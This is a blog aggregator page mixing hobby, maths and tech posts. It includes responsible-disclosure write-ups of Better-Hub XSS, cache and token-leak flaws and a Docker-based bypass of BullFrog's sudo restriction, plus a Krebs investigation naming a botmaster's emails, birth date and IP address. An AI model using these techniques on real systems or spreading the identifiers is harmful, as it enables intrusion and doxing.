Latest Posts (20 found)

MOOving to a self-hosted Bluesky PDS

Bluesky is a “Twitter clone” that runs on the AT Protocol . I have to be honest, I’d struggle to explain how atproto works. I think it’s similar to Nostr but like, good? When atproto devs talk about The Atmosphere they sound like blockchain bros. The marketing needs consideration. Bluesky however, is a lot of fun. Feels like early Twitter. Nobody cool uses Twitter anymore ever. It’s a cesspit of racists asking Gork to undress women. Mastodon and Bluesky are the social platforms I use. I’ve always been tempted to self-host my own Mastodon instance but the requirements are steep. I use the omg.lol server instead. Self-hosting the Bluesky PDS is much less demanding. My setup includes: This is the host machine I glued an NVMe onto the underside. All services run as Docker containers for easy security sandboxing. I say easy but it took many painful years to master Docker. I have the Pi on a VLAN firewall because I’m extra paranoid. I setup my Bluesky PDS using the official Docker container. It’s configure with environment variables and has a single data volume mounted. I backup that volume to my NAS. I’ve put Caddy in front of the PDS container. Right now it just acts as a reverse proxy. This gives me flexibility later if I want to add access logs, rate limiting, or other plugins. Booo! If you know a good European alternative please let me know! The tunnel links Caddy to the outside world via Cloudflare to avoid exposing my home IP address. Cloudflare also adds an extra level of bot protection. The guides I followed suggest adding wildcard DNS for the tunnel. Cloudflare has shuffled the dashboard for the umpteenth time and I can’t figure out how. I think sub-domains are only used for user handles, e.g. . I use a different custom domain for my handle ( ) with a manual TXT record to verify. Allowing the PDS to send emails isn’t strictly necessary. It’s useful for password resets and I think it’ll send a code if I migrate PDS again. I went through the hassle of adding my PDS domain to Proton Mail and followed their SMTP guide . This shows how the PDS enviornment variables are formatted. It took me forever to figure out where the username and password went. PDS MOOver by Bailey Townsend is the tool that does the data migration. It takes your Bluesky password and probably sees your private key, so use at your own risk! I setup a new account to test it before I YOLO’d my main. MOOve successful! I still login at but I now select “custom account provider” and enter my PDS domain. SkyTools has a tool that confirms it. Bluesky Debug can check handles are verified correctly. PDSIs.dev is a neat atproto explorer. I cross-referenced the following guides for help: Most of the Cloudflare stuff is outdated because Cloudflare rolls dice every month. Bluesky is still heavily centralised but the atproto layer allows anyone to control their own data. I like doing that on principle. I don’t like maintenance, but I’ve heard that’s minimal for a PDS. Supposedly it’s possible to migrate back to Bluesky’s PDS if I get bored. I’m tempted to build something in The Atmosphere . Any ideas? Thanks for reading! Follow me on Mastodon and Bluesky . Subscribe to my Blog and Notes or Combined feeds. Notes on Self Hosting a Bluesky PDS Alongside Other Services Self-host federated Bluesky instance (PDS) with CloudFlare Tunnel Host a PDS via a Cloudflare Tunnel Self-hosting Bluesky PDS

0 views

Step aside, phone: week 3

Three-quarters of the way through this “challenge”, and the findings are mostly the same. Phone usage is very easy to keep in check if you decide to put your mind to it. The past seven days have been very similar to the previous seven, and that’s good, since this type of phone usage needs to become the new normal. Contrary to the previous week, this time it was the first half of the week that saw higher usage, and that was mostly due to a few long Telegram sessions late in the day on Monday and Tuesday. 44 or the 54 minutes logged on Monday, and 32 of the 45 logged on Tuesday, were spent on Telegram. Only 26 minutes out of 46 on Wednesday, the rest of the usage was work-related since I had to do a few phone calls and test a couple of things on mobile Safari. The second half of the week saw a lot less phone time, but I did have to spend a lot more time at my computer, taking care of client stuff, and that’s why I barely picked up the phone. Which is fine. I still have not consumed content on the phone, three weeks in. That’s awesome, and I want that to stay that way. Again, very pleased with how this month-long experiment is going, and I do have some takeaways, but I’ll wait until next Sunday to share them. Thank you for keeping RSS alive. You're awesome. Email me :: Sign my guestbook :: Support for 1$/month :: See my generous supporters :: Subscribe to People and Blogs

0 views
devansh Today

Hacking Better-Hub

Better-Hub ( better-hub.com ) is an alternative GitHub frontend — a richer, more opinionated UI layer built on Next.js that sits on top of the GitHub API. It lets developers browse repositories, view issues, pull requests, code blobs, and repository prompts, while authenticating via GitHub OAuth. Because Better-Hub mirrors GitHub content inside its own origin, any unsanitized rendering of user-controlled data becomes significantly more dangerous than it would be on a static page — it has access to session tokens, OAuth credentials, and the authenticated GitHub API. That attack surface is exactly what I set out to explore. Description The repository README is fetched from GitHub, piped through with and enabled — with zero sanitization — then stored in the state and rendered via in . Because the README is entirely attacker-controlled, any repository owner can embed arbitrary JavaScript that executes in every viewer's browser on better-hub.com. Steps to Reproduce Session hijacking via cookie theft, credential exfiltration, and full client-side code execution in the context of better-hub.com. Chains powerfully with the GitHub OAuth token leak (see vuln #10). Description Issue descriptions are rendered with the same vulnerable pipeline: with raw HTML allowed and no sanitization. The resulting is inserted directly via inside the thread entry component, meaning a malicious issue body executes arbitrary script for every person who views it on Better-Hub. Steps to Reproduce Arbitrary JavaScript execution for anyone viewing the issue through Better-Hub. Can be used for session hijacking, phishing overlays, or CSRF-bypass attacks. Description Pull request bodies are fetched from GitHub and processed through with / and no sanitization pass, then rendered unsafely. An attacker opening a PR with an HTML payload in the body causes XSS to fire for every viewer of that PR on Better-Hub. Steps to Reproduce Stored XSS affecting all viewers of the PR. Particularly impactful in collaborative projects where multiple team members review PRs. Description The same unsanitized pipeline applies to PR comments. Any GitHub user who can comment on a PR can inject a stored XSS payload that fires for every Better-Hub viewer of that conversation thread. Steps to Reproduce A single malicious commenter can compromise every reviewer's session on the platform. Description The endpoint proxies GitHub repository content and determines the from the file extension in the query parameter. For files it sets and serves the content inline (no ). An attacker can upload a JavaScript-bearing SVG to any GitHub repo and share a link to the proxy endpoint — the victim's browser executes the script within 's origin. Steps to Reproduce Reflected XSS with a shareable, social-engineered URL. No interaction with a real repository page is needed — just clicking a link is sufficient. Easily chained with the OAuth token leak for account takeover. Description When viewing code files larger than 200 KB, the application hits a fallback render path in that outputs raw file content via without any escaping. An attacker can host a file exceeding the 200 KB threshold containing an XSS payload — anyone browsing that file on Better-Hub gets the payload executed. Steps to Reproduce Any repository owner can silently weaponize a large file. Because code review is often done on Better-Hub, this creates a highly plausible attack vector against developers reviewing contributions. Description The function reads file content from a shared Redis cache . Cache entries are keyed by repository path alone — not by requesting user. The field is marked as shareable, so once any authorized user views a private file through the handler or the blob page, its contents are written to Redis under a path-only key. Any subsequent request for the same path — from any user, authenticated or not — is served directly from cache, completely bypassing GitHub's permission checks. Steps to Reproduce Complete confidentiality breach of private repositories. Any file that has ever been viewed by an authorized user is permanently exposed to unauthenticated requests. This includes source code, secrets in config files, private keys, and any other sensitive repository content. Description A similar cache-keying problem affects the issue page. When an authorized user views a private repo issue on Better-Hub, the issue's full content is cached and later embedded in Open Graph meta properties of the page HTML. A user who lacks repository access — and sees the "Unable to load repository" error — can still read the issue content by inspecting the page source, where it leaks in the meta tags served from cache. Steps to Reproduce Private issue contents — potentially including bug reports, credentials in descriptions, or internal discussion — are accessible to any unauthenticated party who knows or guesses the URL. Description Better-Hub exposes a Prompts feature tied to repositories. For private repositories, the prompt data is included in the server-rendered page source even when the requestor does not have repository access. The error UI correctly shows "Unable to load repository," but the prompt content is already serialized into the HTML delivered to the browser. Steps to Reproduce Private AI prompts — which may contain internal instructions, proprietary workflows, or system prompt secrets — leak to unauthenticated users. Description returns a session object that includes . This session object is passed as props directly to client components ( , , etc.). Next.js serializes component props and embeds them in the page HTML for hydration, meaning the raw GitHub access token is present in the page source and accessible to any JavaScript running on the page — including scripts injected via any of the XSS vulnerabilities above. The fix is straightforward: strip from the session object before passing it as props to client components. Token usage should remain server-side only. When chained with any XSS in this report, an attacker can exfiltrate the victim's GitHub OAuth token and make arbitrary GitHub API calls on their behalf — reading private repos, writing code, managing organizations, and more. This elevates every XSS in this report from session hijacking to full GitHub account takeover . Description The home page redirects authenticated users to the destination specified in the query parameter with no validation or allow-listing. An attacker can craft a login link that silently redirects the victim to an attacker-controlled domain immediately after they authenticate. Steps to Reproduce Phishing attacks exploiting the trusted better-hub.com domain. Can be combined with OAuth token flows for session fixation attacks, or used to redirect users to convincing fake login pages post-authentication. All issues were reported directly to Better-Hub team. The team was responsive and attempted rapid remediation. What is Better-Hub? The Vulnerabilities 01. Unsanitized README → XSS 02. Issue Description → XSS 03. Stored XSS in PR Bodies 04. Stored XSS in PR Comments 05. Reflected XSS via SVG Image Proxy 06. Large-File XSS (>200 KB) 07. Cache Deception — Private File Access 08. Authz Bypass via Issue Cache 09. Private Repo Prompt Leak 10. GitHub OAuth Token Leaked to Client 11. Open Redirect via Query Parameter Disclosure Timeline Create a GitHub repository with the following content in : View the repository at and observe the XSS popup. Create a GitHub issue with the following in the body: Navigate to the issue via to trigger the payload. Open a pull request whose body contains: View the PR through Better-Hub to observe the XSS popup. Post a PR comment containing: View the comment thread via Better-Hub to trigger the XSS. Create an SVG file in a public GitHub repo with content: Direct the victim to: Create a file named containing the payload, padded to exceed 200 KB: Browse to the file on Better-Hub at . The XSS fires immediately. Create a private repository and add a file called . As the repository owner, navigate to the following URL to populate the cache: Open the same URL in an incognito window or as a completely different user. The private file content is served — no authorization required. Create a private repo and create an issue with a sensitive body. Open the issue as an authorized user: Open the same URL in a different session (no repo access). While the access-error UI is shown, view the page source — issue details appear in the tags. Create a private repository and create a prompt in it. Open the prompt URL as an unauthorized user: View the page source — prompt details are present in the HTML despite the access-denied UI. Log in to Better-Hub with GitHub credentials. Navigate to: You are immediately redirected to .

0 views

Notes on Lagrange Interpolating Polynomials

Polynomial interpolation is a method of finding a polynomial function that fits a given set of data perfectly. More concretely, suppose we have a set of n+1 distinct points [1] : And we want to find the polynomial coefficients {a_0\cdots a_n} such that: Fits all our points; that is p(x_0)=y_0 , p(x_1)=y_1 etc. This post discusses a common approach to solving this problem, and also shows why such a polynomial exists and is unique. When we assign all points (x_i, y_i) into the generic polynomial p(x) , we get: We want to solve for the coefficients a_i . This is a linear system of equations that can be represented by the following matrix equation: The matrix on the left is called the Vandermonde matrix . This matrix is known to be invertible (see Appendix for a proof); therefore, this system of equations has a single solution that can be calculated by inverting the matrix. In practice, however, the Vandermonde matrix is often numerically ill-conditioned, so inverting it isn’t the best way to calculate exact polynomial coefficients. Several better methods exist. Lagrange interpolation polynomials emerge from a simple, yet powerful idea. Let’s define the Lagrange basis functions l_i(x) ( i \in [0, n] ) as follows, given our points (x_i, y_i) : In words, l_i(x) is constrained to 1 at and to 0 at all other x_j . We don’t care about its value at any other point. The linear combination: is then a valid interpolating polynomial for our set of n+1 points, because it’s equal to at each (take a moment to convince yourself this is true). How do we find l_i(x) ? The key insight comes from studying the following function: This function has terms (x-x_j) for all j\neq i . It should be easy to see that l'_i(x) is 0 at all x_j when j\neq i . What about its value at , though? We can just assign into l'_i(x) to get: And then normalize l'_i(x) , dividing it by this (constant) value. We get the Lagrange basis function l_i(x) : Let’s use a concrete example to visualize this. Suppose we have the following set of points we want to interpolate: (1,4), (2,2), (3,3) . We can calculate l'_0(x) , l'_1(x) and l'_2(x) , and get the following: Note where each l'_i(x) intersects the axis. These functions have the right values at all x_{j\neq i} . If we normalize them to obtain l_i(x) , we get these functions: Note that each polynomial is 1 at the appropriate and 0 at all the other x_{j\neq i} , as required. With these l_i(x) , we can now plot the interpolating polynomial p(x)=\sum_{i=0}^{n}y_i l_i(x) , which fits our set of input points: We’ve just seen that the linear combination of Lagrange basis functions: is a valid interpolating polynomial for a set of n+1 distinct points (x_i, y_i) . What is its degree? Since the degree of each l_i(x) is , then the degree of p(x) is at most . We’ve just derived the first part of the Polynomial interpolation theorem : Polynomial interpolation theorem : for any n+1 data points (x_0,y_0), (x_1, y_1)\cdots(x_n, y_n) \in \mathbb{R}^2 where no two x_j are the same, there exists a unique polynomial p(x) of degree at most that interpolates these points. We’ve demonstrated existence and degree, but not yet uniqueness . So let’s turn to that. We know that p(x) interpolates all n+1 points, and its degree is . Suppose there’s another such polynomial q(x) . Let’s construct: That do we know about r(x) ? First of all, its value is 0 at all our , so it has n+1 roots . Second, we also know that its degree is at most (because it’s the difference of two polynomials of such degree). These two facts are a contradiction. No non-zero polynomial of degree \leq n can have n+1 roots (a basic algebraic fact related to the Fundamental theorem of algebra ). So r(x) must be the zero polynomial; in other words, our p(x) is unique \blacksquare . Note the implication of uniqueness here: given our set of n+1 distinct points, there’s only one polynomial of degree \leq n that interpolates it. We can find its coefficients by inverting the Vandermonde matrix, by using Lagrange basis functions, or any other method [2] . The set P_n(\mathbb{R}) consists of all real polynomials of degree \leq n . This set - along with addition of polynomials and scalar multiplication - forms a vector space . We called l_i(x) the "Lagrange basis" previously, and they do - in fact - form an actual linear algebra basis for this vector space. To prove this claim, we need to show that Lagrange polynomials are linearly independent and that they span the space. Linear independence : we have to show that implies a_i=0 \quad \forall i . Recall that l_i(x) is 1 at , while all other l_j(x) are 0 at that point. Therefore, evaluating s(x) at , we get: Similarly, we can show that a_i is 0, for all \blacksquare . Span : we’ve already demonstrated that the linear combination of l_i(x) : is a valid interpolating polynomial for any set of n+1 distinct points. Using the polynomial interpolation theorem , this is the unique polynomial interpolating this set of points. In other words, for every q(x)\in P_n(\mathbb{R}) , we can identify any set of n+1 distinct points it passes through, and then use the technique described in this post to find the coefficients of q(x) in the Lagrange basis. Therefore, the set l_i(x) spans the vector space \blacksquare . Previously we’ve seen how to use the \{1, x, x^2, \dots x^n\} basis to write down a system of linear equations that helps us find the interpolating polynomial. This results in the Vandermonde matrix . Using the Lagrange basis, we can get a much nicer matrix representation of the interpolation equations. Recall that our general polynomial using the Lagrange basis is: Let’s build a system of equations for each of the n+1 points (x_i,y_i) . For : By definition of the Lagrange basis functions, all l_i(x_0) where i\neq 0 are 0, while l_0(x_0) is 1. So this simplifies to: But the value at node is , so we’ve just found that a_0=y_0 . We can produce similar equations for the other nodes as well, p(x_1)=a_1 , etc. In matrix form: We get the identity matrix; this is another way to trivially show that a_0=y_0 , a_1=y_1 and so on. Given some numbers \{x_0 \dots x_n\} a matrix of this form: Is called the Vandermonde matrix. What’s special about a Vandermonde matrix is that we know it’s invertible when are distinct. This is because its determinant is known to be non-zero . Moreover, its determinant is [3] : Here’s why. To get some intuition, let’s consider some small-rank Vandermonde matrices. Starting with a 2-by-2: Let’s try 3-by-3 now: We can use the standard way of calculating determinants to expand from the first row: Using some algebraic manipulation, it’s easy to show this is equivalent to: For the full proof, let’s look at the generalized n+1 -by- n+1 matrix again: Recall that subtracting a multiple of one column from another doesn’t change a matrix’s determinant. For each column k>1 , we’ll subtract the value of column k-1 multiplied by from it (this is done on all columns simultaneously). The idea is to make the first row all zeros after the very first element: Now we factor out x_1-x_0 from the second row (after the first element), x_2-x_0 from the third row and so on, to get: Imagine we erase the first row and first column of . We’ll call the resulting matrix . Because the first row of is all zeros except the first element, we have: Note that the first row of has a common factor of x_1-x_0 , so when calculating \det(W) , we can move this common factor out. Same for the common factor x_2-x_0 of the second row, and so on. Overall, we can write: But the smaller matrix is just the Vandermonde matrix for \{x_0 \dots x_{n-1}\} . If we continue this process by induction, we’ll get: If you’re interested, the Wikipedia page for the Vandermonde matrix has a couple of additional proofs.

0 views
iDiallo Today

“How old are you?” Asked the OS

A new law passed in California to require every operating system to collect the user's age at account creation time. The law is AB-1043 . And it was passed in October of 2025. How does it work? Does it apply to offline systems? When I set up my Raspberry Pi at home, is this enforced? What if I give an incorrect age, am I breaking the law now? What if I set my account correctly, but then my kids use the device? What happens? There is no way to enforce this law, but I suspect that's not the point. It's similar to statements you find in IRS documents. The IRS requires you to report all income from illegal activities, such as bribes and scams. Obviously, if you are getting a bribe, you wouldn't report it, but by not reporting it you are breaking additional laws that can be used to get you prosecuted. When you don't report your age to your OS whether it's a windows device or a Tamagotchi, you are breaking the law. It's not enforced of course, but when you are suspected of any other crime, you can be arrested for the age violation first, then prosecuted for something else. What a world we live in.

0 views

Launch Now

Inside us are two wolves. One wolf wants to craft, polish and refine – make things of exceptional quality. The other wolf wants to move fast and get feedback now. The two wolves don’t always get along. For years, I’ve balanced this by working toward exceptional products but constantly collecting private feedback along the way. Then, once we’ve built something excellent, something worthy of attention, we launch it to the world with appropriate fanfare. Videos, marketing campaigns, polished onboarding, and so on. “Here’s something worth trying, we think you’ll really like it.” This totally works. At least, it works as a path to eventually ship high-quality software. Polished, usable, even delightful software. But when it comes to building something people will pay for, it’s neither reliable nor fast. Our first product at Forestwalk was a developer tool – a platform for building and running evaluations of LLM-powered apps . We learned a ton building it, but after a few months – as we approached our first pilot projects – feedback from demos and potential first customers convinced us that this was the wrong path. It was more likely to lead us into a lifestyle business than something big. So we pivoted. We spent a few weeks building a prototype a week, showing demos, doing customer research, and found a second promising product path. Our second product was a productivity tool – a work assistant that could capture, organize, and rationalize teams’ tasks . We learned a ton building it, but after a few months – as we approached a public beta – feedback from private testers and our investors convinced us that this was the wrong path. It was more likely to lead us into a lifestyle business than something big. So we pivoted. The third time purports to be the charm. But at the same time, doing the same thing over and over typically gets the same results. We need to build something profoundly useful, something people really want. We can’t keep hiding away, sending out private demos and prototypes, not fully shipping anything! So, we decided to push harder into the discomfort of showing our work early. Just before Christmas, we decided to commit to something and work towards getting it shipped. This third product is codenamed Cedarloop 1 . It’s a realtime meeting agent. Unlike AIs that passively listen in to meetings and just write up notes after the fact, Cedar joins calls and uses “voice in, visuals out” to screen-share useful observations and perform routine tasks live during a Google Meet or Zoom meeting. The vision is to build a kind of agentic PM assistant. It can respond within a second of you talking 2 , which – when it works – feels like magic. We’ve been learning a lot building it. Recently, we started working with an excellent designer here in Vancouver who was keen to get going. I’d like to do some user testing. What do people say when you let them try it? Well, obviously it’s so early right now. They won’t like it. The inference and onboarding need more work. But we’ve been doing research about problems, needs, willingness to pay, and things like that. Sure… but we should also let people try it. What if we launched now? Well, obviously we can’t launch now . I mean… obviously. Launching now would be embarrassing. It’s not my brand to launch something publicly that’s not ready. On the other hand… I keep a printed copy of Y Combinator’s list of essential startup advice on my desk. And if you know YC, you’ll know that the first point of advice is “Launch now”. Only last month I was interviewing Brett Huneycutt, Wealthsimple’s co-founder . He had a lot of great stories, but one that sticks out is that even as a $10B company, they prioritize launching “now”, for as close as they can get to that definition. It’s not just about speed: a rapid feedback loop is a core ingredient in getting to quality. So we launched now. As of today, people can check out our research-preview realtime meeting agent at Cedarloop.ai . With luck, they’ll report issues, inform what we should prioritize next, and tell us what problems they’d love to have automated away. We’re only a few hours in, and yep – people are reporting issues. Linear integration had an OAuth issue. Login didn’t work in social-media webviews. We’ve been so focused on the desktop experience that we’ve let the mobile layout get janky. This is embarrassing! But also, there’s signal. People are trying the Linear integration. Our desktop-focused app is being discovered on mobile. Folks care enough to click at all. And in a week or so, we’ll have a smoother onboarding flow than we would have gotten to with weeks of private user tests. So it’s worth the pain. We’re going to take the feedback, follow the signal, learn and re-learn, and do better. We’ll use it to forge the best damn live agent ever – or, if the feedback peters out, we’ll know we’re on the wrong path, and find the right one. In the meantime, there’s a lot to do. 3 Back to work! This is not a good name yet. For example, sometimes iOS mishears “Hey Cedar” as “Hey Siri”. But part of our move-fast strategy is to worry more about names once we’ve proven something has traction. At that point, we’ll put in the work to give it the right name – and eventually rename the company after it. ↩ It’s fascinating how much you can do to get LLM response times down. Our first prototype often took over 8000ms to respond, which doesn’t feel live at all. Once we got it under ~1200ms, voice-in-vision-out suddenly felt alive – a step change. We have a lot of work planned to get Cedarloop even faster and much more reliable, which I’m keen to write about when I can. ↩ Speaking of having a lot to do: if you’re an experienced product-minded developer in Vancouver who would be excited to iterate and build out realtime agents using LLMs and TypeScript, we’re hiring a Founding Engineer . Just sayin’. ↩ This is not a good name yet. For example, sometimes iOS mishears “Hey Cedar” as “Hey Siri”. But part of our move-fast strategy is to worry more about names once we’ve proven something has traction. At that point, we’ll put in the work to give it the right name – and eventually rename the company after it. ↩ It’s fascinating how much you can do to get LLM response times down. Our first prototype often took over 8000ms to respond, which doesn’t feel live at all. Once we got it under ~1200ms, voice-in-vision-out suddenly felt alive – a step change. We have a lot of work planned to get Cedarloop even faster and much more reliable, which I’m keen to write about when I can. ↩ Speaking of having a lot to do: if you’re an experienced product-minded developer in Vancouver who would be excited to iterate and build out realtime agents using LLMs and TypeScript, we’re hiring a Founding Engineer . Just sayin’. ↩

0 views
iDiallo Yesterday

That's it, I'm cancelling my ChatGPT

Just like everyone, I read Sam Altman's tweet about joining the so-called Department of War, to use ChatGPT on DoW classified networks. As others have pointed out, this is the entry point for mass surveillance and using the technology for weapons deployment. I wrote before that we had the infrastructure for mass surveillance in place already, we just needed an enabler. This is the enabler. This comes right after Anthropic's CEO wrote a public letter stating their refusal to work with the DoW under their current terms. Now Anthropic has been declared a public risk by the President and banned from every government system. Large language models have become ubiquitous. You can't say you don't use them because they power every tech imaginable. If you search the web, they write a summary for you. If you watch YouTube, one appears right below the video. There's a Gemini button on Chrome, there's Copilot on Edge and every Microsoft product. There it is in your IDE, in Notepad, in MS Paint. You can't escape it. Switching from one LLM to the next makes minimal to no difference for everyday use. If you have a question you want answered or a document to summarize, your local Llama will do the job just fine. If you want to compose an email or proofread your writing, there's no need to reach for the state of the art, any model will do. For reviewing code, DeepSeek will do as fine a job as any other model. A good use of ChatGPT's image generator. All this to say, ChatGPT doesn't have a moat. If it's your go-to tool, switching away from it wouldn't make much of a difference. At this point, I think the difference is psychological. For example, my wife once told me she only ever uses Google and can't stand any other search engine. What she didn't know was that she had been using Bing on her device for years. She had never noticed, because it was the default. When I read the news about OpenAI, I was ready to close my account. The only problem is, well, I never use ChatGPT. I haven't used it in years. My personal account lay dormant. My work account has a single test query despite my employer trying its hardest to get us to use it. But I think none of that matters when OpenAI caters to a government agency with a near-infinite budget. For every public account that gets closed, OpenAI will make up for it with deeper integration into classified networks. Not even 24 hours later, the US is at war with Iran. So while we're at it, here is a nice little link to help you close your OpenAI account .

0 views
ava's blog Yesterday

rose ▪ bud ▪ thorn - february 2026

Reply via email Published 28 Feb, 2026 5 year anniversary with my wife. :) Started a creation event for the Gazette. I created more art! I made some buttons and banners, and some pixel art for myself and with Xaya . I rebranded my professional website (not this one). Put a lot of effort into the colors, associations, text, font and all, with a proper brand kit development. That's a first. I had a healthier relationship with food recently. I managed to summarize and translate 1-2 court decisions each week for noyb.eu, and I became Silver Member (10+ translated/summarized court cases). 2 more and I will already be Gold Member (20+). I received a some helpful replies to e-mail inquiries for opportunities :) I was finally able to publish the first interview for my privacy professionals series! Friends visited and it wasn't just fun, but it also got me cleaning up the apartment so well. My wife is baking amazing bread recently. The first two to three attempts were a disappointing, but we kept at it and now our bread is sooooo good. She also baked me some matcha strawberry sugar cookies. My hair is long enough now to properly take care of it again with conditioner and oils. I can't wait until it grows long enough for a first haircut to kind of get it even and not so layered; I am also thinking of getting bangs? They always annoy me, but I think I can make it work this time...? I always think that... and at the same time, I also wanna grow it out again and bleach some money pieces. And I kinda wanna dye the underside of my hair, near my neck, too? I am conflicted. Still working on sending out e-mails for more interviews. Working on switching away from Discord! Probably Matrix. Already had an account there but it somehow got lost, so I made a new one. Now just working on transitioning some stuff. I've decluttered my closet, now I just need to sell the stuff. I'm planning a date day for myself where I get my nails done again (haven't done that in months), a lash lift, a visit to the cinema, and buying some clothing I need. I am in need of replacing some items and also diving deeper into a new personal style I want. Reintroducing caffeine has been a bust. My tolerance seems to have been plummeting to zero thanks to my experiment, and even very weak black tea is having some negative effects... and even my matcha! I guess I'll have to reduce it to once a week. I haven't been studying nearly as much as I should. I've been indulging a lot in just resting, reading, and creating, which isn't super bad, but I feel guilty for neglecting my studies when I have 4 upcoming exams for modules totaling 30 ECTS as a part-time student. :( Job applications and apartment hunting paused for now. Right now seems like an absolutely terrible time for both.

0 views

LLM Use in the Python Source Code

There is a trick that is spreading through social media. If you block the claude user on GitHub, then each time you visit a GitHub repository that has commits by this user you get a banner at the top alerting you of the user's participation. It's an easy way to spot projects that have started to rely on coding agents, in this case on Claude Code specifically. Imagine the surprise when you see that CPython , one of the most popular open-source projects in the world, is now receiving contributions from :

0 views

There should be a citizen-led path to amend the Constitution

There are many issues with widespread bipartisan agreement that never go anywhere , for example limiting corporate money in campaigns and making gerrymandering illegal . As a surprise to no one, Congress is the bottleneck on these issues and many, many more. If the people on both sides generally agree for years and years, and Congress still doesn’t do anything about it, then that’s a structural governance problem. For stuck issues like these, we should have a citizen-led path to amend the Constitution as a solution to this governance problem. Now I fully agree that it should be super hard to amend the Constitution, and so we could make this path just as hard as the Congress-led one. 1 Thanks for reading Gabriel Weinberg! Subscribe for free to receive new posts and support my work. The current Congress-led path is two-thirds of both houses need to propose an amendment and then three-fourths of state legislatures need to ratify it. 2 A citizen-led path could similarly require two-thirds of states to propose an amendment (via something like signature campaigns within those states) and then a nationwide three-fourths vote to ratify it. 3 In other words the thresholds could be similar, just put directly in the hands of the people. You would still need most red and blue states working together to pass an amendment, such that nothing could pass without super-majority bipartisan support. That is, a super high bar. There are a lot of interesting structural reform proposals out there, but most require new Constitutional amendments to have lasting staying power. 4 To really unlock the possibilities for those, we need a citizen-led amendment path in place first. Of course, we would need an amendment using the old way to get this new way in place. 5 Congress won’t reform itself, but a citizen-led amendment path could. Thanks for reading! Subscribe for free to receive new posts or get the audio version . I’d also argue the current path is too hard, but I’m ignoring that for now since it is independent of this argument. There is technically also a path for state legislatures to call a constitutional convention, but it’s never been used and it still routes through legislatures and representatives rather than citizens directly. Signature campaigns could mimic current processes of how citizen-led ballot initiatives work, but there are other options (including non-signature-based options) as well. A few examples of interesting structural reforms likely requiring an amendment to be long-term effective are increasing the number of representatives, term limits, and rank-choice voting. This type of citizen-led amendment path has been proposed as a Consitutional amendment in the past and hasn’t gone anywhere either, but at some point we may reach a breaking point where something like this could take hold.

0 views
devansh Yesterday

sudo restriction bypass via Docker Group in BullFrog GitHub Action

Least privilege is one of those security principles that everyone agrees with and almost nobody fully implements. In the GitHub Actions context, it means your workflow steps should only have the access they actually need, and no more. Running arbitrary third-party actions or build scripts as a user with unrestricted is a liability, one compromised dependency, one malicious action, and an attacker owns the runner. BullFrog , the egress-filtering agent for GitHub Actions I wrote about previously , ships a feature called specifically to address this. Set it and BullFrog removes sudo access for all subsequent steps in the job, or so it claims. is a BullFrog configuration option that, when set to , strips sudo privileges from the runner user for all steps that follow the BullFrog setup step. It's designed as a privilege reduction primitive, you harden the environment early in the job so that nothing downstream can accidentally (or intentionally) run as root. A typical hardened workflow looks like this: After this step, should fail, and subsequent steps should be constrained to what the unprivileged user can do. BullFrog achieves this by modifying the sudoers configuration, essentially removing or neutering the runner user's sudo entry. This works at the command level, the binary is still there, but the policy that would grant elevation is gone. On GitHub-hosted Ubuntu runners, the user is already a member of the group. This means the runner user can spawn Docker containers without sudo, no privilege escalation required to get Docker running. And Docker, when given and a host filesystem mount, is essentially root with extra steps. A privileged container with can write anywhere on the host filesystem, including . The sudo restriction is applied at one layer. Docker punches straight through to the layer below it. The feature only removes the sudoers entry for the runner user. It does not restrict Docker access, does not drop the runner from the group, and does not prevent privileged container execution. Because Docker daemon access is equivalent to root access on the host, the sudo restriction can be fully reversed in a single command — no password, no escalation, no interaction required. This drops a sudoers rule back into place by writing through the container's view of the host filesystem. After this, succeeds again and the runner has full root access for the rest of the job. The following workflow demonstrates the full bypass, disable sudo with BullFrog, confirm it's gone, restore it via Docker, confirm it's back: The workflow output confirms the sequence cleanly, BullFrog disables sudo, the verification step passes, Docker writes the sudoers rule, and the final step confirms full sudo access is back — all within the same job, all as the unprivileged user, no external dependencies beyond the Docker image. Reported to the BullFrog team on November 28th, 2025. No response, acknowledgment, or fix was issued in the roughly three months that followed. Disclosing publicly now. This is the second BullFrog vulnerability I'm disclosing simultaneously due to the same lack of response — see also: Bypassing egress filtering in BullFrog GitHub Action ). Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (I did not bother to check) What is BullFrog's ? How Sudo is Disabled The Docker Problem Vulnerability Proof of Concept Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026

0 views
Heather Burns Yesterday

I, Sisyphus

I spoke with New Scientist about a handful of clauses in the Children’s Wellbeing and Schools Bill, which is currently reaching the finish line of the Parliamentary process.

0 views

Who is the Kimwolf Botmaster “Dort”?

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf , the world’s largest and most disruptive botnet. Since then, the person in control of Kimwolf — who goes by the handle “ Dort ” — has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher’s home. This post examines what is knowable about Dort based on public information. A public “dox” created in 2020 asserted Dort was a teenager from Canada (DOB August 2003) who used the aliases “ CPacket ” and “ M1ce .” A search on the username CPacket at the open source intelligence platform OSINT Industries finds a GitHub account under the names Dort and CPacket that was created in 2017 using the email address [email protected] . Image: osint.industries. The cyber intelligence firm Intel 471 says [email protected] was used between 2015 and 2019 to create accounts at multiple cybercrime forums, including Nulled (username “Uubuntuu”) and Cracked (user “Dorted”); Intel 471 reports that both of these accounts were created from the same Internet address at Rogers Canada (99.241.112.24). Dort was an extremely active player in the Microsoft game Minecraft who gained notoriety for their “ Dortware ” software that helped players cheat. But somewhere along the way, Dort graduated from hacking Minecraft games to enabling far more serious crimes. Dort also used the nickname DortDev , an identity that was active in March 2022 on the chat server for the prolific cybercrime group known as LAPSUS$ . Dort peddled a service for registering temporary email addresses, as well as “ Dortsolver ,” code that could bypass various CAPTCHA services designed to prevent automated account abuse. Both of these offerings were advertised in 2022 on SIM Land , a Telegram channel dedicated to SIM-swapping and account takeover activity. The cyber intelligence firm Flashpoint indexed 2022 posts on SIM Land by Dort that show this person developed the disposable email and CAPTCHA bypass services with the help of another hacker who went by the handle “ Qoft .” “I legit just work with Jacob,” Qoft said in 2022 in reply to another user, referring to their exclusive business partner Dort. In the same conversation, Qoft bragged that the two had stolen more than $250,000 worth of Microsoft Xbox Game Pass accounts by developing a program that mass-created Game Pass identities using stolen payment card data. Who is the Jacob that Qoft referred to as their business partner? The breach tracking service Constella Intelligence finds the password used by [email protected] was reused by just one other email address: [email protected] . Recall that the 2020 dox of Dort said their date of birth was August 2003 (8/03). Searching this email address at 